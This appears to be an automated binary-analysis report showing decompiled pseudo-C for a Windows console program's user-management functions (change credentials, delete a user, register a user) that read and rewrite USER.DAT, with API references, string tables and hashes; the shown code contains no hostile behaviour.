                                                				_v107 = 0;
                                                				_v103 = 0;
                                                				_v99 = 0;
                                                				_v95 = 0;
                                                				_v91 = 0;
                                                				_v87 = 0;
                                                				_v83 = 0;
                                                				_v80 = 0;
                                                				_v79 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v16 = 0;
                                                				_v12 = 0;
                                                				E012320E0(0, __edi, __esi, 0, __fp0);
                                                				E012312B0(0x19, 8);
                                                				_push("User Name  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E0123738B("%s", 0x1252ee4);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Password  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E012312F0(_t134, _t135,  &_v112);
                                                				_t66 = E01236EF1("USER.DAT", "r");
                                                				_t140 = _t136 + 0x18;
                                                				 *0x1252f28 = _t66;
                                                				while(1) {
                                                					_push( &_v144);
                                                					_push( &_v176);
                                                					_t67 =  *0x1252f28; // 0x0
                                                					_t68 = E01237021(_t67, "%s %s %s\n", 0x1252ee0);
                                                					_t141 = _t140 + 0x14;
                                                					if(_t68 == 0xffffffff) {
                                                						break;
                                                					}
                                                					_t109 = E01238230(0x1252ee4,  &_v176);
                                                					_t140 = _t141 + 8;
                                                					if(_t109 == 0) {
                                                						_t110 = E01238230(0x1252f02,  &_v144);
                                                						_t140 = _t140 + 8;
                                                						if(_t110 == 0) {
                                                							_v16 = _v16 + 1;
                                                						}
                                                					}
                                                				}
                                                				_t116 =  *0x1252f28; // 0x0
                                                				_push(_t116);
                                                				E01236DB6(_t113, _t134, _t135, __eflags);
                                                				_t142 = _t141 + 4;
                                                				E012320E0(_t116, _t134, _t135, __eflags, _t161);
                                                				__eflags = _v16;
                                                				if(__eflags != 0) {
                                                					E012312B0(8, 0xa);
                                                					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
                                                					E0123715C(_t113, _t134, _t135, __eflags);
                                                					_t143 = _t142 + 4;
                                                					__eflags = _v5 - 0x59;
                                                					if(__eflags == 0) {
                                                						do {
                                                							L10:
                                                							E012320E0(_t116, _t134, _t135, __eflags, _t161);
                                                							_v12 = 0;
                                                							E012312B0(0x19, 8);
                                                							_push("NEW User Name        : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E0123738B("%s",  &_v208);
                                                							E012312B0(0x19, 0xa);
                                                							_push("NEW Password         : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E012312F0(_t134, _t135,  &_v48);
                                                							E012312B0(0x19, 0xc);
                                                							_push("Confirm NEW Password : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E012312F0(_t134, _t135,  &_v80);
                                                							_t116 =  &_v80;
                                                							_t84 = E01238230( &_v48,  &_v80);
                                                							_t143 = _t143 + 0x1c;
                                                							__eflags = _t84;
                                                							if(__eflags != 0) {
                                                								E012320E0( &_v80, _t134, _t135, __eflags, _t161);
                                                								E012312B0(0xa, 0xa);
                                                								_push(0x124f710);
                                                								E0123715C(_t113, _t134, _t135, __eflags);
                                                								_t143 = _t143 + 4;
                                                								_t105 = _v12 + 1;
                                                								__eflags = _t105;
                                                								_v12 = _t105;
                                                							}
                                                							__eflags = _v12;
                                                						} while (__eflags != 0);
                                                						 *0x1252f28 = E01236EF1("USER.DAT", 0x124f740);
                                                						_t86 = E01236EF1("temp.dat", "a");
                                                						_t149 = _t143 + 0x10;
                                                						 *0x1252f20 = _t86;
                                                						while(1) {
                                                							_push( &_v144);
                                                							_push( &_v176);
                                                							_t87 =  *0x1252f28; // 0x0
                                                							_t88 = E01237021(_t87, "%s %s %s\n", 0x1252ee0);
                                                							_t150 = _t149 + 0x14;
                                                							__eflags = _t88 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							_t95 = E01238230(0x1252ee4,  &_v176);
                                                							_t154 = _t150 + 8;
                                                							__eflags = _t95;
                                                							if(__eflags != 0) {
                                                								L17:
                                                								_push( &_v144);
                                                								_push( &_v176);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t130 =  *0x1252f20; // 0x0
                                                								_push(_t130);
                                                								E01236F06(_t113, _t134, _t135, __eflags);
                                                								_t149 = _t154 + 0x14;
                                                								L19:
                                                								continue;
                                                							}
                                                							_t98 = E01238230(0x1252f02,  &_v144);
                                                							_t154 = _t154 + 8;
                                                							__eflags = _t98;
                                                							if(__eflags == 0) {
                                                								_push( &_v48);
                                                								_push( &_v208);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t132 =  *0x1252f20; // 0x0
                                                								_push(_t132);
                                                								E01236F06(_t113, _t134, _t135, __eflags);
                                                								_t149 = _t154 + 0x14;
                                                								goto L19;
                                                							}
                                                							goto L17;
                                                						}
                                                						_t89 =  *0x1252f28; // 0x0
                                                						_push(_t89);
                                                						E01236DB6(_t113, _t134, _t135, __eflags);
                                                						_t119 =  *0x1252f20; // 0x0
                                                						_push(_t119);
                                                						E01236DB6(_t113, _t134, _t135, __eflags);
                                                						E012320E0(_t119, _t134, _t135, __eflags, _t161);
                                                						E012312B0(0x19, 0xa);
                                                						_push("Record has been EDITED successfully!");
                                                						return E0123715C(_t113, _t134, _t135, __eflags);
                                                					}
                                                					_t106 = _v5;
                                                					__eflags = _t106 - 0x79;
                                                					if(__eflags != 0) {
                                                						return _t106;
                                                					}
                                                					goto L10;
                                                				}
                                                				E012312B0(0xa, 0xa);
                                                				_push(0x124f640);
                                                				return E0123715C(_t113, _t134, _t135, __eflags);
                                                			}






























































                                                0x01232b10
                                                0x01232b10
                                                0x01232b10
                                                0x01232b10
                                                0x01232b19
                                                0x01232b1f
                                                0x01232b22
                                                0x01232b25
                                                0x01232b28
                                                0x01232b2b
                                                0x01232b2e
                                                0x01232b31
                                                0x01232b34
                                                0x01232b37
                                                0x01232b3d
                                                0x01232b40
                                                0x01232b43
                                                0x01232b46
                                                0x01232b49
                                                0x01232b4c
                                                0x01232b4f
                                                0x01232b52
                                                0x01232b55
                                                0x01232b5b
                                                0x01232b5e
                                                0x01232b61
                                                0x01232b64
                                                0x01232b67
                                                0x01232b6a
                                                0x01232b6d
                                                0x01232b70
                                                0x01232b73
                                                0x01232b7a
                                                0x01232b81
                                                0x01232b8a
                                                0x01232b8f
                                                0x01232b94
                                                0x01232ba6
                                                0x01232bb2
                                                0x01232bb7
                                                0x01232bbc
                                                0x01232bc8
                                                0x01232bd7
                                                0x01232bdc
                                                0x01232bdf
                                                0x01232be4
                                                0x01232bea
                                                0x01232bf1
                                                0x01232bfc
                                                0x01232c02
                                                0x01232c07
                                                0x01232c0d
                                                0x00000000
                                                0x00000000
                                                0x01232c1b
                                                0x01232c20
                                                0x01232c25
                                                0x01232c33
                                                0x01232c38
                                                0x01232c3d
                                                0x01232c45
                                                0x01232c45
                                                0x01232c3d
                                                0x01232c48
                                                0x01232c4a
                                                0x01232c50
                                                0x01232c51
                                                0x01232c56
                                                0x01232c59
                                                0x01232c5e
                                                0x01232c62
                                                0x01232c83
                                                0x01232c88
                                                0x01232c8d
                                                0x01232c92
                                                0x01232c99
                                                0x01232c9c
                                                0x01232cab
                                                0x01232cab
                                                0x01232cab
                                                0x01232cb0
                                                0x01232cbb
                                                0x01232cc0
                                                0x01232cc5
                                                0x01232cd9
                                                0x01232ce5
                                                0x01232cea
                                                0x01232cef
                                                0x01232cfb
                                                0x01232d04
                                                0x01232d09
                                                0x01232d0e
                                                0x01232d1a
                                                0x01232d1f
                                                0x01232d27
                                                0x01232d2c
                                                0x01232d2f
                                                0x01232d31
                                                0x01232d33
                                                0x01232d3c
                                                0x01232d41
                                                0x01232d46
                                                0x01232d4b
                                                0x01232d51
                                                0x01232d51
                                                0x01232d54
                                                0x01232d54
                                                0x01232d57
                                                0x01232d57
                                                0x01232d73
                                                0x01232d82
                                                0x01232d87
                                                0x01232d8a
                                                0x01232d8f
                                                0x01232d95
                                                0x01232d9c
                                                0x01232da7
                                                0x01232dad
                                                0x01232db2
                                                0x01232db5
                                                0x01232db8
                                                0x00000000
                                                0x00000000
                                                0x01232dca
                                                0x01232dcf
                                                0x01232dd2
                                                0x01232dd4
                                                0x01232dee
                                                0x01232df4
                                                0x01232dfb
                                                0x01232dfc
                                                0x01232e01
                                                0x01232e06
                                                0x01232e0c
                                                0x01232e0d
                                                0x01232e12
                                                0x01232e3b
                                                0x00000000
                                                0x01232e3b
                                                0x01232de2
                                                0x01232de7
                                                0x01232dea
                                                0x01232dec
                                                0x01232e1a
                                                0x01232e21
                                                0x01232e22
                                                0x01232e27
                                                0x01232e2c
                                                0x01232e32
                                                0x01232e33
                                                0x01232e38
                                                0x00000000
                                                0x01232e38
                                                0x00000000
                                                0x01232dec
                                                0x01232e40
                                                0x01232e45
                                                0x01232e46
                                                0x01232e4e
                                                0x01232e54
                                                0x01232e55
                                                0x01232e5d
                                                0x01232e66
                                                0x01232e6b
                                                0x00000000
                                                0x01232e75
                                                0x01232c9e
                                                0x01232ca2
                                                0x01232ca5
                                                0x01232e7b
                                                0x01232e7b
                                                0x00000000
                                                0x01232ca5
                                                0x01232c68
                                                0x01232c6d
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232B94
                                                • _wscanf.LIBCMT ref: 01232BA6
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232BBC
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01232C02
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 01232C72
                                                • _wprintf.LIBCMT ref: 01232C8D
                                                • _wprintf.LIBCMT ref: 01232CC5
                                                • _wscanf.LIBCMT ref: 01232CD9
                                                • _wprintf.LIBCMT ref: 01232CEF
                                                • _wprintf.LIBCMT ref: 01232D0E
                                                • _wprintf.LIBCMT ref: 01232D46
                                                • _swscanf.LIBCMT ref: 01232DAD
                                                • _fprintf.LIBCMT ref: 01232E0D
                                                • _fprintf.LIBCMT ref: 01232E33
                                                • _wprintf.LIBCMT ref: 01232E70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
                                                • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
                                                • API String ID: 1431756120-371646773
                                                • Opcode ID: d396c3ed00661b2f4ae72a74369d26af51d90cfbdae015bbb73c10797e6c65de
                                                • Instruction ID: fcc9a805462d712e36d20f9da7b5c517cc61060683e2cd0e342f5b7ae423bcdf
                                                • Opcode Fuzzy Hash: d396c3ed00661b2f4ae72a74369d26af51d90cfbdae015bbb73c10797e6c65de
                                                • Instruction Fuzzy Hash: C181A7F1D70306EFEF15EBE9DD42FAD76746BB5700F008169E505B6280E670A2188B76
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E01232800(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				char _v20;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v52;
                                                				char _v84;
                                                				char _v116;
                                                				char _v129;
                                                				char _v139;
                                                				char _v154;
                                                				char _v188;
                                                				void* __ebp;
                                                				intOrPtr _t47;
                                                				void* _t49;
                                                				char _t54;
                                                				intOrPtr _t56;
                                                				void* _t58;
                                                				intOrPtr _t62;
                                                				void* _t65;
                                                				intOrPtr _t67;
                                                				intOrPtr _t75;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				intOrPtr _t83;
                                                				void* _t86;
                                                				void* _t88;
                                                				intOrPtr _t92;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                				intOrPtr _t96;
                                                				intOrPtr _t99;
                                                				intOrPtr _t105;
                                                				intOrPtr _t107;
                                                				intOrPtr _t109;
                                                				void* _t118;
                                                				void* _t122;
                                                				void* _t123;
                                                				void* _t124;
                                                				void* _t125;
                                                				void* _t127;
                                                				void* _t128;
                                                				void* _t132;
                                                				void* _t133;
                                                				void* _t139;
                                                
                                                				_t146 = __fp0;
                                                				_t117 = __esi;
                                                				_t116 = __edi;
                                                				_t89 = __ebx;
                                                				_v52 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v12 = 0;
                                                				E012320E0(__ecx, __edi, __esi, 0, __fp0);
                                                				E012312B0(0x19, 8);
                                                				_push("User Name  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E0123738B("%s", 0x1252ee4);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Password  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E012312F0(_t116, _t117,  &_v52);
                                                				_t47 = E01236EF1("USER.DAT", "r");
                                                				_t122 = _t118 + 0x18;
                                                				 *0x1252f28 = _t47;
                                                				while(1) {
                                                					_push( &_v116);
                                                					_push( &_v84);
                                                					_t92 =  *0x1252f28; // 0x0
                                                					_t49 = E01237021(_t92, "%s %s %s\n", 0x1252ee0);
                                                					_t123 = _t122 + 0x14;
                                                					if(_t49 == 0xffffffff) {
                                                						break;
                                                					}
                                                					_t86 = E01238230(0x1252ee4,  &_v84);
                                                					_t122 = _t123 + 8;
                                                					if(_t86 == 0) {
                                                						_t88 = E01238230(0x1252f02,  &_v116);
                                                						_t122 = _t122 + 8;
                                                						if(_t88 == 0) {
                                                							_v12 = _v12 + 1;
                                                						}
                                                					}
                                                				}
                                                				_t105 =  *0x1252f28; // 0x0
                                                				_push(_t105);
                                                				E01236DB6(_t89, _t116, _t117, __eflags);
                                                				_t124 = _t123 + 4;
                                                				E012320E0(_t92, _t116, _t117, __eflags, _t146);
                                                				__eflags = _v12;
                                                				if(__eflags != 0) {
                                                					E012312B0(0xf, 0xa);
                                                					_push("Are you sure you want to DELETE this user? <Y/N> : ");
                                                					E0123715C(_t89, _t116, _t117, __eflags);
                                                					_t125 = _t124 + 4;
                                                					_t54 = _v5;
                                                					__eflags = _t54 - 0x59;
                                                					if(_t54 == 0x59) {
                                                						L10:
                                                						 *0x1252f28 = E01236EF1("USER.DAT", "r");
                                                						_t56 = E01236EF1("temp.dat", "a");
                                                						_t127 = _t125 + 0x10;
                                                						 *0x1252f20 = _t56;
                                                						while(1) {
                                                							_push( &_v116);
                                                							_push( &_v84);
                                                							_t93 =  *0x1252f28; // 0x0
                                                							_t58 = E01237021(_t93, "%s %s %s\n", 0x1252ee0);
                                                							_t128 = _t127 + 0x14;
                                                							__eflags = _t58 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							_t79 = E01238230(0x1252ee4,  &_v84);
                                                							_t139 = _t128 + 8;
                                                							__eflags = _t79;
                                                							if(__eflags != 0) {
                                                								L14:
                                                								_push( &_v116);
                                                								_push( &_v84);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t80 =  *0x1252f20; // 0x0
                                                								_push(_t80);
                                                								E01236F06(_t89, _t116, _t117, __eflags);
                                                								_t127 = _t139 + 0x14;
                                                								L15:
                                                								continue;
                                                							}
                                                							_t83 = E01238230(0x1252f02,  &_v116);
                                                							_t127 = _t139 + 8;
                                                							__eflags = _t83;
                                                							if(__eflags == 0) {
                                                								goto L15;
                                                							}
                                                							goto L14;
                                                						}
                                                						_t94 =  *0x1252f28; // 0x0
                                                						_push(_t94);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						_t107 =  *0x1252f20; // 0x0
                                                						_push(_t107);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						 *0x1252f28 = E01236EF1("LOG.DAT", "r");
                                                						_t62 = E01236EF1("temp.dat", "w");
                                                						_t132 = _t128 + 0x18;
                                                						 *0x1252f20 = _t62;
                                                						while(1) {
                                                							_push( &_v129);
                                                							_push( &_v139);
                                                							_push( &_v154);
                                                							_t96 =  *0x1252f28; // 0x0
                                                							_t65 = E01237021(_t96, "%s %s %s %s",  &_v188);
                                                							_t133 = _t132 + 0x18;
                                                							__eflags = _t65 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							E01247CF2( &_v188);
                                                							E01247CF2( &_v20);
                                                							_t75 = E01238230( &_v188,  &_v20);
                                                							_t132 = _t133 + 0x10;
                                                							__eflags = _t75;
                                                							if(__eflags != 0) {
                                                								_push( &_v129);
                                                								_push( &_v139);
                                                								_push( &_v154);
                                                								_push( &_v188);
                                                								_push("%s %s %s %s\n");
                                                								_t99 =  *0x1252f20; // 0x0
                                                								_push(_t99);
                                                								E01236F06(_t89, _t116, _t117, __eflags);
                                                								_t132 = _t132 + 0x18;
                                                							}
                                                						}
                                                						_t109 =  *0x1252f28; // 0x0
                                                						_push(_t109);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						_t67 =  *0x1252f20; // 0x0
                                                						_push(_t67);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						E012320E0(_t96, _t116, _t117, __eflags, _t146);
                                                						E012312B0(0x19, 0xa);
                                                						_push("Record DELETED successfully!");
                                                						return E0123715C(_t89, _t116, _t117, __eflags);
                                                					}
                                                					__eflags = _v5 - 0x79;
                                                					if(_v5 != 0x79) {
                                                						return _t54;
                                                					}
                                                					goto L10;
                                                				}
                                                				E012312B0(0xa, 0xa);
                                                				_push(0x124f4fc);
                                                				return E0123715C(_t89, _t116, _t117, __eflags);
                                                			}






















































                                                0x01232800
                                                0x01232800
                                                0x01232800
                                                0x01232800
                                                0x01232809
                                                0x0123280f
                                                0x01232812
                                                0x01232815
                                                0x01232818
                                                0x0123281b
                                                0x0123281e
                                                0x01232821
                                                0x01232824
                                                0x01232827
                                                0x0123282e
                                                0x01232837
                                                0x0123283c
                                                0x01232841
                                                0x01232853
                                                0x0123285f
                                                0x01232864
                                                0x01232869
                                                0x01232875
                                                0x01232884
                                                0x01232889
                                                0x0123288c
                                                0x01232891
                                                0x01232894
                                                0x01232898
                                                0x012328a3
                                                0x012328aa
                                                0x012328af
                                                0x012328b5
                                                0x00000000
                                                0x00000000
                                                0x012328c0
                                                0x012328c5
                                                0x012328ca
                                                0x012328d5
                                                0x012328da
                                                0x012328df
                                                0x012328e7
                                                0x012328e7
                                                0x012328df
                                                0x012328ea
                                                0x012328ec
                                                0x012328f2
                                                0x012328f3
                                                0x012328f8
                                                0x012328fb
                                                0x01232900
                                                0x01232904
                                                0x01232925
                                                0x0123292a
                                                0x0123292f
                                                0x01232934
                                                0x01232937
                                                0x0123293b
                                                0x0123293e
                                                0x0123294d
                                                0x0123295f
                                                0x0123296e
                                                0x01232973
                                                0x01232976
                                                0x0123297b
                                                0x0123297e
                                                0x01232982
                                                0x0123298d
                                                0x01232994
                                                0x01232999
                                                0x0123299c
                                                0x0123299f
                                                0x00000000
                                                0x00000000
                                                0x012329aa
                                                0x012329af
                                                0x012329b2
                                                0x012329b4
                                                0x012329cb
                                                0x012329ce
                                                0x012329d2
                                                0x012329d3
                                                0x012329d8
                                                0x012329dd
                                                0x012329e2
                                                0x012329e3
                                                0x012329e8
                                                0x012329eb
                                                0x00000000
                                                0x012329eb
                                                0x012329bf
                                                0x012329c4
                                                0x012329c7
                                                0x012329c9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x012329c9
                                                0x012329ed
                                                0x012329f3
                                                0x012329f4
                                                0x012329fc
                                                0x01232a02
                                                0x01232a03
                                                0x01232a1d
                                                0x01232a2c
                                                0x01232a31
                                                0x01232a34
                                                0x01232a39
                                                0x01232a3c
                                                0x01232a43
                                                0x01232a4a
                                                0x01232a57
                                                0x01232a5e
                                                0x01232a63
                                                0x01232a66
                                                0x01232a69
                                                0x00000000
                                                0x00000000
                                                0x01232a72
                                                0x01232a7e
                                                0x01232a91
                                                0x01232a96
                                                0x01232a99
                                                0x01232a9b
                                                0x01232aa0
                                                0x01232aa7
                                                0x01232aae
                                                0x01232ab5
                                                0x01232ab6
                                                0x01232abb
                                                0x01232ac1
                                                0x01232ac2
                                                0x01232ac7
                                                0x01232ac7
                                                0x01232aca
                                                0x01232acf
                                                0x01232ad5
                                                0x01232ad6
                                                0x01232ade
                                                0x01232ae3
                                                0x01232ae4
                                                0x01232aec
                                                0x01232af5
                                                0x01232afa
                                                0x00000000
                                                0x01232b04
                                                0x01232944
                                                0x01232947
                                                0x01232b0a
                                                0x01232b0a
                                                0x00000000
                                                0x01232947
                                                0x0123290a
                                                0x0123290f
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232841
                                                • _wscanf.LIBCMT ref: 01232853
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232869
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 012328AA
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 01232914
                                                • _wprintf.LIBCMT ref: 0123292F
                                                • _swscanf.LIBCMT ref: 01232994
                                                • _fprintf.LIBCMT ref: 012329E3
                                                • _swscanf.LIBCMT ref: 01232A5E
                                                • _fprintf.LIBCMT ref: 01232AC2
                                                • _wprintf.LIBCMT ref: 01232AFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
                                                • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
                                                • API String ID: 3163849712-4002591224
                                                • Opcode ID: 8f68f0044d92cee46a3857197f934cba047f56bb2c8d8ece20c0c8ecc6e3979f
                                                • Instruction ID: 076d58e85ca01c1a6b5067cfb64ac55c1ffb54fb449b3a7240fb921a9c9eedcb
                                                • Opcode Fuzzy Hash: 8f68f0044d92cee46a3857197f934cba047f56bb2c8d8ece20c0c8ecc6e3979f
                                                • Instruction Fuzzy Hash: C071CBF2D30306EBDB15EBE4ED82EBE72786BE5700F04411DE905A5184FA71E25887B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E012325C0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v8;
                                                				char _v12;
                                                				char _v15;
                                                				char _v19;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v44;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v71;
                                                				char _v75;
                                                				char _v76;
                                                				char _v108;
                                                				char _v140;
                                                				void* __ebp;
                                                				intOrPtr _t42;
                                                				void* _t44;
                                                				intOrPtr _t53;
                                                				intOrPtr _t58;
                                                				intOrPtr _t67;
                                                				void* _t70;
                                                				void* _t73;
                                                				intOrPtr _t75;
                                                				intOrPtr _t76;
                                                				intOrPtr _t79;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t85;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				void* _t103;
                                                
                                                				_t103 = __fp0;
                                                				_t84 = __esi;
                                                				_t83 = __edi;
                                                				_t73 = __ebx;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_v76 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v44 = 0;
                                                				_t74 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v19 = 0;
                                                				_v15 = 0;
                                                				do {
                                                					E012320E0(_t74, _t83, _t84, 0, _t103);
                                                					_v8 = 0;
                                                					E012312B0(0x19, 8);
                                                					_push("User Name        : ");
                                                					E0123715C(_t73, _t83, _t84, 0);
                                                					E0123738B("%s", 0x1252ee4);
                                                					_t42 = E01236EF1("USER.DAT", "r");
                                                					_t88 = _t85 + 0x14;
                                                					 *0x1252f28 = _t42;
                                                					_v12 = 0;
                                                					while(1) {
                                                						_push( &_v140);
                                                						_push( &_v108);
                                                						_t75 =  *0x1252f28; // 0x0
                                                						_t44 = E01237021(_t75, "%s %s %s\n", 0x1252ee0);
                                                						_t89 = _t88 + 0x14;
                                                						if(_t44 == 0xffffffff) {
                                                							goto L6;
                                                						}
                                                						_t70 = E01238230( &_v108, 0x1252ee4);
                                                						_t88 = _t89 + 8;
                                                						if(_t70 == 0) {
                                                							_v12 = _v12 + 1;
                                                						}
                                                					}
                                                					L6:
                                                					_t74 =  *0x1252f28; // 0x0
                                                					_push(_t74);
                                                					E01236DB6(_t73, _t83, _t84, __eflags);
                                                					_t90 = _t89 + 4;
                                                					__eflags = _v12;
                                                					if(__eflags == 0) {
                                                						E012312B0(0x19, 0xa);
                                                						_push("Password         : ");
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						E012312F0(_t83, _t84,  &_v76);
                                                						E012312B0(0x19, 0xc);
                                                						_push("Confirm Password : ");
                                                						E0123715C(_t73, _t83, _t84, __eflags);
                                                						_t74 =  &_v44;
                                                						E012312F0(_t83, _t84,  &_v44);
                                                						_t53 = E01238230(0x1252f02,  &_v44);
                                                						_t85 = _t90 + 0x10;
                                                						__eflags = _t53;
                                                						if(__eflags != 0) {
                                                							E012320E0( &_v44, _t83, _t84, __eflags, _t103);
                                                							E012312B0(0xa, 0xa);
                                                							_push(0x124f444);
                                                							E0123715C(_t73, _t83, _t84, __eflags);
